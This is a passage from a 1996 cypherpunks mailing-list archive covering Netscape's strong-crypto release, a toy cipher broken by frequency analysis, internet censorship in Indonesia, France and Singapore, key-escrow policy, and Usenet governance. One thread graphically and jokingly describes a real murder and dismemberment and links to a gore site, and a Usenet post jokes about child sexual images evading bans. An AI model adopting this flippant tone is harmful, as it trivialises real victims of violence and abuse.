>  who thought the associated press was bad
> 
> 

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 20 Aug 1996 12:56:30 +0800
To: cypherpunks@toad.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <199608181037.MAA14188@basement.replay.com>
Message-ID: <4vb5ud$skn@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3216F54C.425C@netscape.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>Alex de Joode wrote:
>> 
>> Jeff Weinstein (jsw@netscape.com) wrote:
>> 
>> : The final release of Navigator 3.0, complete with non-exportable
>> : strong crypto, is now available for download by US citizens.  Note
>> : that this is the released version of 3.0, so it will not expire.
>> : You can get it from:
>> 
>> Would it be possible to both supply an Linux ELF and a.out binary ?
>
>  No, we will only be supplying ELF.  Since linux is not officially
>supported, we really don't have the resources to do multiple versions.
>
Not to mention that plugins are virtually impossible with a.out...

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhkbBUZRiTErSPb1AQF5fgP/V6r/aWB7KML48S4y0+MFaAb9XIaUxOQX
tRZNSJoRAldSveIxli5nAHN/BI7XGPgIcEmS992PWWJfkEtt+ogmtm6VpXRGf+pa
2bWpf01+4UYZddhH2UnjVlkd9cDigtmkXd4SVJBO5ebHEBMzesQvDOaUJeXshT7S
eWdxPj8lOh8=
=VErV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 20 Aug 1996 12:59:12 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.SCO.3.93.960819184212.8520D-100000@grctechs.va.grci.com>
Message-ID: <Pine.3.89.9608191853.A17091-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 19 Aug 1996, Mark O. Aldrich wrote:

> On Mon, 19 Aug 1996, Rich Graves wrote:
> 
> Yes, it's true.  Her boyfriend kills the guy while she's
> giving him a blow job.  Then they "get naked," hack up the body, and pose
> various body parts in, uh, 'interesting' positions.  The whole story's on
> the Web site.  Check them out at:
> 
> http://www.grotesque.com/
That was intense...

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 20 Aug 1996 10:55:02 +0800
To: nick@multipro.com (Nick West)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608191642.LAA07079@server.multipro.com>
Message-ID: <199608200008.TAA16708@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Nick West wrote:
> >
> >Did anyone save a copy of the altered web page?  I would like to see
> >what the crackers did.
> >
> They showed a the page on CNN Headline News yesterday. They might show it
> sometime again today, stay tuned.

Now I have the "Department of INJUSTICE" Web page on my personal 
Web page, http://www.algebra.com/~ichudov (follow the links).

A tarred and gsipped content is available for download and mirroring.

I personally find the web page very well and artistically done, and
extremely funny. The guy who did it had a good taste.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Tue, 20 Aug 1996 10:45:59 +0800
To: winsock@c2.org
Subject: Re: No Subject - Lesson in cracking (cryptoanalysis 001)
Message-ID: <960819193406_263572605@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-08-19 05:44:34 EDT, you write:

> SAMPLE MESSAGE: ("HAIL ERIS")
>  
>  CONVERSATION:
>  A B C D E F G H I J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z
>  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
>  
>  STEP 1. Write out the message (HAIL ERIS) and put all the vowels at the
end
>          (HLRSAIEI)
>  STEP 2. Reverse order (IEIASRLH)
>  STEP 3. Convert to numbers (9-5-9-1-19-18-12-8)
>  STEP 4. Put into numerical order (1-5-8-9-9-12-18-19)
>  STEP 5. Convert back to letters (AEHIILRS)
>  
>  This cryptographic cypher code is GUARANTEED TO BE 100% UNBREAKABLE.
>  
>  

Hmmmmm, lets see here....

The numbers are one to one with the letters - hence this suggests a frequency
attack right off the bat.  You see, poor pathetic soul, if we know the
algorithm, as you have spelt it out, and we know the alphabet of the
plaintext (thats the message your trying to protect), we know that the
language has certain letters used more frequently than others.  Like, ya know
"e" is a very popular letter, so is t and s.  Collect enough cypher text and
ya just match frequency to frequency - a high number of 6's are replaced with
an e, and so on down the line.

QED why you don't go one to one with the alphabet.

OK, so we got the letters we are interested in working with.  Now, still
knowing the language the alphabet represents, we know that certain letters
usually follow other letters.  For example, re, ent, th, st, ing, need I
really go on?

Now we just start chunking up the peices according to spelling rules we know
about - then with the help of a handy dandy spell checker like thing, when we
get close to a word, we clump the chunks together.

Actually, mixing your letters around helps cuz one needs to do a lot of
shuffling here - but believe me, algorithms are out there.  Plus, the more
cipher text you provide, the easier it is to nab your info cuz there is more
information for the particular algorithm I'm thinking of to work with.

Once ya get a likely set of words, ya start looking for a pattern that can
get ya these set of words into and gain the original pattern.

QED why one does not depend on shuffling for protection.

Anyone else wanna explain things too?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 20 Aug 1996 13:41:22 +0800
To: cypherpunks@toad.com
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.3.89.9608191853.A17091-0100000@netcom14>
Message-ID: <199608200300.UAA25571@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

> That was intense...

It was...        "different"

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 20 Aug 1996 14:04:54 +0800
To: cypherpunks@toad.com
Subject: Re: Indonesia detains democracy activist after post to mailing list (fwd)
In-Reply-To: <Pine.GUL.3.95.960819144001.2971B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960819195846.3818B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 19 Aug 1996, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Mon, 19 Aug 1996, Charles Gimon wrote:
> [...]
> > >    Trouble in Paradise
> > >    by Declan McCullagh (declan@well.com)
> > >    Washington, DC, 18 August
> > >    
> > >    Indonesian democracy activists have taken their fight for freedom
> > >    to the Net, and the government doesn't approve.
> > >    
> > >    After distributing email messages about riots in Jakarta last month to
> > >    an international Indonesian-politics mailing list, Prihadi Beny
> > >    Waluyo, a lecturer at Duta Wacana Christian University, was arrested
> > >    and interrogated by the military. Since then, the mailing list has
> > >    been banned from the country and Waluyo has returned to his house,
> > >    where he remains under surveillance.
> > 
> > [dan lain-lain...]
> > 
> > Exactly which mailing list was "banned from the country"? All the
> > Indonesian mailing lists I'm on, including apakabar@clark.net, are
> > functioning normally, with no unusual complaints or interruptions.
> 
> Never mind the details. What's important is that this is yet another example
> of net censorship, like the Berkeley administration's reading student email
> and the FBI's monitoring and disrupting patriot email. 
> 
> It's really sad, the difference between HRW/AI and Wired. You know, Amnesty
> has some outstanding policies regarding accuracy, objectivity, and
> universality. That's why they're accorded such respect. Human Rights Watch,
> which has only been around since the late 70's and committed a few major
> faux pas in Central America, is still learning. Wired decided that it had
> all the answers years ago.


Rich is frothing again. Time to killfile him again. Note he contributes
nothing of substance except a vapid anti-Wired rant that has been done
better elsewhere, like www.howtired.com. (Personally, I don't even read
Wired much anymore. To each his own.)

As for UCB and the FBI threads, Rich is talking about back
fight-censorship discussions. He seems to think that I endorse every
message I forward to a mailing list. He is incorrect. (Rather, I offer the
information to the list, as Judge Sloviter took Olsen's testimony, "for
what it's worth.")

Back to Indonesia -- my column should have said the Indonesian military is
*trying* to ban the mailing list from the country. They haven't succeeded
yet. Time will tell.

I have more information on Indonesia at http://www2.eff.org/~declan/global/ -- 
right now, use the www2 address since not all directories seem to be 
updating on the mirror servers properly right now.

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt@freenix.fr (Jerome Thorel)
Date: Tue, 20 Aug 1996 06:28:28 +0800
To: thorel@netpress.fr
Subject: lambda 2.10
Message-ID: <v01540b0cae3e6be5b238@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


netizen's --> Lambda Bulletin 2.10 <-- contents
flash bulletin

+ French Constitution censors Internet control
+ Singapore and the Censorship Proxy Server
+ G7 and the EC take strong steps for Key Escrow Encryption


*               *               *               *               *


French Constitution censors Internet control

As we speculated in our last bulletin (2.09), the French Conseil
Constitutionnel, watchdog of the 1958 Constitution, censored 2 articles in
a new telecom act which were intended to establish a kind of administrative
control over Internet speech and online services.

The nine "Sages" said that the creation of the Conseil Superieur de la
Telematique, which would have make guidelines on Internet content, breaches
article 34 of the Constitution which states that the Parliament can act
alone to dictate rules concerning "civic rights and fundamentals garanties
given to citizens for a fair exercice of public liberties". The CST could
have undermine these principles, because the law didn't specify clearly how
it would have taken its decisions. So the Conseil recognized the particular
state of the Internet, which is not a basic medium.

Only one section remains in the censored law : it obliges ISPs to give
their clients "technical means" to forbid or select access to online
services, software that allows a so-called "parental control".

*               *               *               *               *

Singapore and the Censorship Proxy Server

A communique from SingNet, Singapore's main Internet Service Provider,
states that "ALL SingNet customers will be required to connect to SingNet's
proxy server by the deadline September 14th 1996, failing which you would
not be able to access the web without the proxy. This applies to all
dial-up, ISDN, and leased line customers (STIX customers are exempted). "

The proxy server will ease the ISP to "Deny access to blacklisted sites
supplied by SBA". SingNet said that "Access to sites banned by the SBA will
prompt the message :
The site you requested is not accessible
For more information on Singapore's Internet regulation, please check
http://www.gov.sg/sba/netreg/regrel.htm".

On July 11 the Singapore government passed the Singapore Broadcasting
Authority Act (Chapter 297) in which it announced a "Class Licence Scheme"
aimed "to encourage responsible use of the Internet while facilitating its
healthy development in Singapore. It encourages minimum standards in
cyberspace and seeks to protect Net users, particularly the young, against
the broadcast of unlawful or objectionable materials. ... SBA will focus on
content which may undermine public morals, political stability and
religious harmony of Singapore. However, SBA recognises that it is
impossible to regulate the Internet fully. ... Singaporeans can help SBA in
the identification of objectionable sites in order to keep cyberspace
clean. SBA welcomes public feedback on objectionable content found on the
Internet. Members of the public can write to SBA, call its toll-free
hotline ... or post their views on the SBA homepage at
http://www.gov.sg/sba. "

China, which has created its own Internet regulations aimed at controlic
data traffic and urged netizens to declare themselves to the authorities,
approved the Singapore Act and an official was quoted as saying, "China has
a lot to learn from Singapore's experience" (source : Fight-censorship
mailing list).

*               *               *               *               *

G7 and the EC take strong steps for Key Escrow Encryption

The European Commission's DG-13 division on information security (Infosec)
opened on July 30th a "call for tenders" for "preparatory works" towards
regulating encryption procedures. The plan is aimed to test the
introduction of the Europe-wide network of Trusted Third Party Services
(ETS).

Observers saw in this move the so-called "guidelines" the EC was to propose
last year, when press reports (Nature, Sept. 28, 1995) argued the
Commission and the Council of Europe in Strasbourg were willing to regulate
encryption use through the creation of TTPs.

The Infosec call for tenders, which will end by September 30, is to
"identify, define and verify ... operationnal, technical, regulatory and
legal aspects ... to assess the effectiveness, economics and acceptability
of Trusted Third Party Services."

Other voices in European talks, however, said these "preparatory works" are
to push for EU countries to adopt TTPs and the principles of key-escrow
encryption. Nordic countries such as Finland, Denmark and Sweden, are said
to be opposed to change encryption legislation, as France and Britain took
steps in June and July to enforce the creation of TTPs in their own
country.

On July 30 G7 countries agreed policies that would "accelerate
consultations on encryption that allows, when necessary, lawful government
access to data and communications in order to prevent or investigate acts
of terrorism, while protecting the privacy of legitimate communications".
The EPIC, in Washington, DC, said "stronger measures sought by the US to
restrict information on the Internet and limit the availabilioty of
encryption were apparently not adopted by the G7 countries". Among other
industrialised nations, Japan and Australia are said, like Nordic countries
in Europe, to oppose key escrow as a mean to regulate the free flow of
information. Remember the OECD talks in June, were the US tried to impose
key-escrow legislation to the 27-countries' club of the industrial world
(see lambda 2.09)

*****
Soon archived on www.freenix.fr/netizen

-----
Jerome Thorel =-= Journaliste/Free-lance Reporter =-= Paris, France
   =+= the lambda bulletin --> http://www.freenix.fr/netizen =+=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Tue, 20 Aug 1996 11:06:20 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [fnord] Re: Discordians a-gogo (aggoo)
In-Reply-To: <2.2.32.19960819174537.00ac513c@mail.teleport.com>
Message-ID: <199608200031.UAA17032@charon.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Alan Olsen wrote:
: 
: ObDiscordian: Have you noticed that there are five levels of priority in Eudora?

Or that RFC23 is entitled "Transmission of multiple control messages"?

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhkHUA0HmAyu61cJAQFFIgP8CFjdpNaPJ2vCqX5nlc+TRpCjt1FgyMvg
FSd7PzwSgFu5jTXgeuWgZE/JkZ+6iZPo7vFdKgAGxU+pKok3jkXspgk38JP3Q4ay
uR1+GHq0auHbY5kGZseyzGPRBOAHglxUxMO41n67e7FdwoYuO1DeQVura8hGTYAr
kd94gHuvTFE=
=vNwc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 14:15:19 +0800
To: cypherpunks@toad.com
Subject: Re: Naked woman decapitates man on Internet!!!
Message-ID: <ae3e8146170210046916@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 8/20/96, Lucky Green wrote:
>On Mon, 19 Aug 1996, Mark O. Aldrich wrote:
>
>> On Mon, 19 Aug 1996, Rich Graves wrote:
>>
>> Yes, it's true.  Her boyfriend kills the guy while she's
>> giving him a blow job.  Then they "get naked," hack up the body, and pose
>> various body parts in, uh, 'interesting' positions.  The whole story's on
>> the Web site.  Check them out at:
>>
>> http://www.grotesque.com/
>That was intense...

But not as intense as it could be with Internet video!

BTW, I've linked this page to my "A Childe's Own Primer on the Net," but I
have warned young impressionables to only view the page if they want to see
something gross. (Since no child wants to see something gross, this should
deter them.)

I wonder how the images were gotten? The site mentions that they were
entered as evidence in the trial of the two bikers, but presumably the
photo evidence would have been sealed. Not that this means much, given that
the autopsy photos of Nicole Brown Simpson made it out onto the Net shortly
after being taken.

(I guess one of the evidence clerks or attorneys had a scanner and access
to a remailer....)

I do expect this to be added to the list of evils that the peo-CDA
attorneys will cite.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 20 Aug 1996 14:41:52 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Naked woman decapitates man on Internet!!!
Message-ID: <2.2.32.19960820035848.00b201dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:00 PM 8/19/96 -0700, Lucky Green wrote:

>That was intense...

Just goes to show you what some people will do to get a head... ]:>

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arnauld Dravet <scraver@mnet.fr>
Date: Tue, 20 Aug 1996 11:55:57 +0800
To: cypherpunks@toad.com
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.GUL.3.95.960819122021.1842D-100000@Networking.Stanford.EDU>
Message-ID: <32191CBE.63076145@mnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> You just gotta love the headline. Anyone have the URL?
> 
> Seen on Newspage headlines; I assume the full text is on ClariNet.
> 
>    NAKED WOMAN DECAPITATES MAN ON INTERNET - Pictures of a naked young
>    woman decapitating a man with a saw are available on the Internet, to
>    the consternation of police in Munich who say they are unable to do
>    anything about it. [AGENCE FRANCE PRESSE, 175 words]
> 
> -rich
>  who thought the associated press was bad



U should try www.grotesque.com
i dunno if it exists any longer
cya
sChTrOuMf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 20 Aug 1996 14:06:25 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
In-Reply-To: <199608192034.NAA19771@netcom17.netcom.com>
Message-ID: <w8PXsD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[I know the group-advice-lackey-Goebbels-reincarnation-stooge is reading this,
but he probably doesn't have the balls to reply]

mpd@netcom.com (Mike Duvos) writes:
> One of the nice things about IRC is that if the Empire State
> Building suddenly blows up, you can tune to #bomb and generally
> find several hundred people interested in discussing it without
> having to go through some complicated newgroup/rmgroup/discussion
> procedure.

Unfortunately, there's no easy way to rmgroup a usenet newsgroup once it
gets created. Many sites ignore all rmgroups. In fact, many large sites
now ignore all newgroups unless a user specifically asks to carry a new
newsgroup.

I believe the main reason why most newsadmins seem to want to have some
restrictions on newgrouping is the lack of efficient rmgrouping.

If we could newgroup misc.news.current-events.empire-state-bombing
and then have it disappear quetly and automatically once the non-spam
traffic is gone, I'm sure a lot fewer people would object to its creation.

> The real data base of Usenet is the totality of messages, indexed
> by message ID, and there are so many newsgroups now that allowing
> the Newsgroups: line to have arbitrary contents in the message
> header would do little to increase the confusion. Entering each
> arbitrary entry in the Newsgroups: line into a secondary
> searchable index would provide the same functionality as we have
> now with the conventional arrangement of newsgroups.

Assuming that this is done, why bother with newgroup/rmgroup at all?
If you think comp.language.algol is a worthwhile newsgroup (as I do),
just put it in your header and see if anyone sees your article.
Well-named keywords in Newsgroups: will act as these Snelling(?)
points senile Tim ranted about.

> With governments creating lists of "banned" newsgroups, and an
> official creation process managed by the "Cabal", Usenet is much
> more vulnerable to state control than it would be if newsgroups
> were simply arbitrary strings which existed somewhere in the
> current window into the history file.  A newsgroup would then
> exist if there were messages in it, and wouldn't exist if it had
> remained unused for some reasonable period of time.

The reason for Cabal's existence is twofold. First, it is a bunch
of control freaks who want to be in charge and get a kick out of
telling users "you can't do this". Second, sysadmins are willing
to put up with this shit because they think they need some means
to control newsgrouping.

> Now that search engines are becoming the best way to read Usenet
> anyway, and the Newsgroups: line is just another field in a set
> of search specifications, there is no reasonable reason to limit
> what may be placed there to some list of "20,000" pre-defined
> strings, or some government controlled subset of the above.

Absolutely.

> If Singapore bans alt.sex.hooters, you could simply post to
> alt.culture.singapore.i.got.your.hooters.right.here. This
> would effectly jerk the rug out from under the "banned
> newsgroups" gestapo, and create a namespace so large you would
> always be able to construct an appropriately suggestive new entry
> in the compliment of any part that was blocked.

Yes.

> It would also send the correct message that "newsgroups" are
> simply one of many labels on an article, and are not cyberspacial
> tearooms where bad people congregate and there is guilt by
> association.
>
> The alternative to doing something reasonable like this is
> probably to see mass migration from "banned newsgroups" to
> off-topic groups, like Lolita pictures in rec.pets.cats, when the
> inevitable crackdown comes. As long as people can post
> anonymously, they will simply switch to another existing
> newsgroup when the one they are posting to becomes blocked. Once
> the inevitable reciprocal pissing contest between posters and
> censors gets going, Usenet as we know it will likely be
> destroyed.

Usenet as I knew it 1- years ago has already been destroyed.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 20 Aug 1996 12:05:08 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199608200120.VAA05671@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


So, how do you UNDO the encryptation?  Gee, no wonder it's uncrackable.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 20 Aug 1996 07:39:22 +0800
To: cypherpunks@toad.com
Subject: search engine improvement
Message-ID: <199608191931.VAA02971@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Keywords: distributed ratings systems, search engines, spiders, 
spiderspace, idea futures, The Shockwave Rider, John Brunner


You know there is a trick that might greatly improve the 
effectiveness of a search engine at almost no cost to the end
user.  It is the well-known heuristic of "If Person A likes X
and Y, and Person B likes X, then Person B probably likes Y.",
combined with passive polling (which is getting information
about people's opinions just by watching their actions, instead
of by asking them).


A first simple implementation would keep a table of the pages
that people choose, keyed from the query that they originally
submitted.  Those pages that people choose most frequently from
the list of matching pages (and/or those pages that people
"stop" on-- that they do _not_ follow by further searching),
would get bumped up a little in the list.


This would be massively expensive in networking, storage, and
computation, giving those hi-tech Alpha clusters at AltaVista
something to do...  :^)


There are plenty of extras and refinements that could be added
(for example, put some keywords identifying your "affiliation"
in a separate field.  It will only consider the results from
other people who entered the same affiliation keywords when
weighting your search results.).  And there are some good topics
for further discussion, such as is it worthwhile to distinguish
between "relevancy" and "value"?


I don't have a comprehensive list of people who are already
working on this area (distributed ratings) (if I did, I might 
have Cc:'ed them), but I know that many people are.  I hope that
they and the search engine people get together and make cool
stuff soon.


There is the interesting issue of whether this will cause
self-reinforcing "degeneration", where people (or an
"affiliation"-keyed group of people) accidentally overlook a
worthy page early in the game, and then, using each other's
behavior to influence their own, reinforce that mistake.


As a final attribution note:  John Brunner thought of this idea
idea in his prophetic novel _The Shockwave Rider_ in the 75.  
There is a wonderful line which I can't find right now, about 
how it turned out to be a flywheel instead of an oracle, merely 
aggregating human mistakes and successes.


Regards,

Bryce

P.S.  ObCryptoRelevance:  Um...  you could get paid for your
ratings using Chaumian ecash, and even have your ratings popped
into the right "affiliation" using Chaumian credentials...

P.P.S.  CryptoRelevance isn't very Ob anymore, is it?  Just as
well, IMESHO.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMhjA+EjbHy8sKZitAQGpIQMAyDcdHUgK9/KhNskvUG8AAbourl1Hg6J5
ZIzo7aTnDq3ZGN9RnqKRkBRRmk4hjN1rFFWvQUYtA3XQQl85scE2XVGG/oURBoTW
EU4WwB2oMSsAVGkYHn02B4gFn8gO6hmA
=tZn3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 20 Aug 1996 07:55:12 +0800
To: cypherpunks@toad.com
Subject: Re: CS First Boston lawsuit
In-Reply-To: <Pine.SUN.3.94.960819120150.9756A-100000@polaris>
Message-ID: <3218C83C.62319AC4@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sun, 18 Aug 1996, Timothy C. May wrote:
> >
> > Can you cite an example of such a "John Doe" trial in the U.S.?
> 
> Not exactly, but judgements against John Doe's or even "$956,334.34" are
> common.  Typically they are default judgements where a property seizure is
> involved.
> 
> "The United States of America v. $534,444.00" and "The United States of
> AMerica v. One Red Porsche" is a common theme.

And of course since the defendant is not a person, it does not have to
be presumed innocent :-(

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 20 Aug 1996 15:42:08 +0800
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: your mail
In-Reply-To: <199608200120.VAA05671@envirolink.org>
Message-ID: <Pine.3.89.9608192243.A19706-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Daniel Miskell wrote:

> So, how do you UNDO the encryptation?  Gee, no wonder it's uncrackable.
> 
> Daniel.
> 
Umm...you missed the joke.  Take a closer look at the word Noitutitsbus. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 20 Aug 1996 15:54:51 +0800
To: cypherpunks@toad.com
Subject: Re: Naked woman decapitates man on Internet!!!
Message-ID: <199608200525.WAA07745@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 19 Aug 96, 20:37, Timothy C. May wrote:

> At 2:00 AM 8/20/96, Lucky Green wrote:
> >On Mon, 19 Aug 1996, Mark O. Aldrich wrote:
> >
> >> On Mon, 19 Aug 1996, Rich Graves wrote:
> >>
> >> http://www.grotesque.com/
> >That was intense...
> 
> But not as intense as it could be with Internet video!
> 
> --Tim May

Sick, stuff.  Yet everyone has to sneek a peek, just like a car 
crash.  Hey, I did.  I made the whole trip through the lurid pages.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 20 Aug 1996 15:32:36 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Naked woman decrapitates man on Internet!!!
Message-ID: <199608200525.WAA07739@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sick, stuff.  Yet everyone has to sneek a peek, just like a car 
crash.  Hey, I did.  I made the whole trip through the lurid pages.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 20 Aug 1996 16:11:49 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
Message-ID: <199608200551.WAA05510@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 PM 8/19/96 -0700, Mike Duvos wrote:

>The alternative to doing something reasonable like this is
>probably to see mass migration from "banned newsgroups" to
>off-topic groups, like Lolita pictures in rec.pets.cats, when the
>inevitable crackdown comes.

Or, perhaps, rec.humbert.humbert.humbert.humbert.humbert.humbert    B^)   (2x3=6)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 20 Aug 1996 14:21:30 +0800
To: cypherpunks@toad.com
Subject: Taxes on Internet access prediction
Message-ID: <32193A1F.31BB@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


States and municipalities are taxing internet access.  Who wants to
make a prediction about if/when the IRS will start to count net access
as a taxable fringe benefit of employment?

(At a small company where I once worked, a tax accountant visiting
one day noticed that we had a weight bench set up in a back corner of
the big "back room".  He advised us to be careful, because the IRS
could count that as a taxable employee benefit.)

-- 
______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 20 Aug 1996 14:35:07 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Naked woman decrapitates man on Internet!!!
In-Reply-To: <Pine.BSD.3.92.960819181607.5683A-100000@miso.wwa.com>
Message-ID: <32193CC8.415C@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


> http://www.grotesque.com

You mean, like, no decrapitation?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Roger Healy OBC)
Date: Tue, 20 Aug 1996 16:33:33 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: [RANT] Death of Usenet: Film at 11
In-Reply-To: <199608200001.RAA02120@netcom8.netcom.com>
Message-ID: <199608200621.XAA18741@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> At  1:34 PM 8/19/96 -0700, Mike Duvos wrote:
